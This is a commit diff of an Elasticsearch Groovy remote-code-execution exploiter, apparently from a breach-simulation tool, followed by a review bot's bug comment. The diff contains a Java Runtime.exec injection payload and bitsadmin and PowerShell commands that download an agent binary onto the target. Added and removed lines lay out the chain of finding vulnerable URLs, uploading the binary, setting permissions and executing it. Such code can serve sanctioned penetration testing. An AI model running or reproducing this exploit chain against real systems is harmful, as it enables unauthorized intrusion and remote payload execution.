Refactored elastic exploiter according to the latest web_rce framework changes. Tested on Windows and Linux.
parent
76523e7379
commit
56b3190cb5
|
@ -7,13 +7,12 @@
|
||||||
import json
|
import json
|
||||||
import logging
|
import logging
|
||||||
import requests
|
import requests
|
||||||
from network.elasticfinger import ES_SERVICE, ES_PORT
|
|
||||||
from exploit.web_rce import WebRCE
|
from exploit.web_rce import WebRCE
|
||||||
from model import WGET_HTTP_UPLOAD
|
from model import WGET_HTTP_UPLOAD
|
||||||
|
|
||||||
import re
|
import re
|
||||||
|
|
||||||
__author__ = 'danielg'
|
__author__ = 'danielg, VakarisZ'
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
@ -31,55 +30,30 @@ class ElasticGroovyExploiter(WebRCE):
|
||||||
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
|
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
|
||||||
JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m'
|
JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m'
|
||||||
|
|
||||||
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
|
||||||
|
|
||||||
# Both commands are prepared for use in future development
|
# Both commands are prepared for use in future development
|
||||||
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
||||||
POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\""
|
POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s'" \
|
||||||
|
r" -OutFile '%(monkey_path)s' -UseBasicParsing\\\""
|
||||||
|
|
||||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(ElasticGroovyExploiter, self).__init__(host)
|
super(ElasticGroovyExploiter, self).__init__(host)
|
||||||
|
|
||||||
def exploit_host(self):
|
def get_exploit_config(self):
|
||||||
# self.exploit_host_linux()
|
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
|
||||||
if ES_SERVICE not in self.host.services:
|
exploit_config['dropper'] = True
|
||||||
LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr)
|
exploit_config['url_extensions'] = ['_search?pretty']
|
||||||
return False
|
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': self.RDP_CMDLINE_HTTP}
|
||||||
# Build url from host and elastic port(not https)
|
return exploit_config
|
||||||
urls = self.build_potential_urls([[ES_PORT, False]], ['_search?pretty'])
|
|
||||||
vulnerable_urls = []
|
|
||||||
for url in urls:
|
|
||||||
if self.check_if_exploitable(url):
|
|
||||||
vulnerable_urls.append(url)
|
|
||||||
self._exploit_info['vulnerable_urls'] = vulnerable_urls
|
|
||||||
if not vulnerable_urls:
|
|
||||||
return False
|
|
||||||
|
|
||||||
if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
|
def get_open_service_ports(self, port_list, names):
|
||||||
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
# We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service
|
||||||
return True
|
valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names)
|
||||||
|
elastic_service = [service for service in self.host.services if 'elastic-search' in service][0]
|
||||||
if not self.set_host_arch(vulnerable_urls[0]):
|
elastic_port = [elastic_service.lstrip('elastic-search-'), False]
|
||||||
return False
|
valid_ports.append(elastic_port)
|
||||||
|
return valid_ports
|
||||||
commands = {'windows': self.RDP_CMDLINE_HTTP,
|
|
||||||
'linux': WGET_HTTP_UPLOAD}
|
|
||||||
|
|
||||||
data = self.upload_monkey(vulnerable_urls[0], commands)
|
|
||||||
|
|
||||||
# We can't use 'if not' because response may be ''
|
|
||||||
if data is not False and data['response'] is False:
|
|
||||||
return False
|
|
||||||
|
|
||||||
if self.change_permissions(vulnerable_urls[0], data['path']) is False:
|
|
||||||
return False
|
|
||||||
|
|
||||||
if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
|
|
||||||
return False
|
|
||||||
|
|
||||||
return True
|
|
||||||
|
|
||||||
def exploit(self, url, command):
|
def exploit(self, url, command):
|
||||||
command = re.sub(r"\\", r"\\\\\\\\", command)
|
command = re.sub(r"\\", r"\\\\\\\\", command)
|
||||||
|
|
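Review bot: In the new `get_open_service_ports`, `elastic_service.lstrip('elastic-search-')` strips a set of characters rather than a prefix, and the `[...][0]` index raises IndexError when no `elastic-search` service was recorded for the host, whereas the removed `exploit_host` logged and returned False in that case. For purely numeric port names `lstrip` happens to give the right result, but it silently breaks for any name containing one of those letters, so a slice is the safer idiom. I would replace the three lines with `elastic_services = [s for s in self.host.services if 'elastic-search' in s]`, `if elastic_services:` and `    valid_ports.append([elastic_services[0][len('elastic-search-'):], False])`. The appended port is a string taken from the service name; whether the base class expects an int there cannot be told from this hunk and is worth confirming.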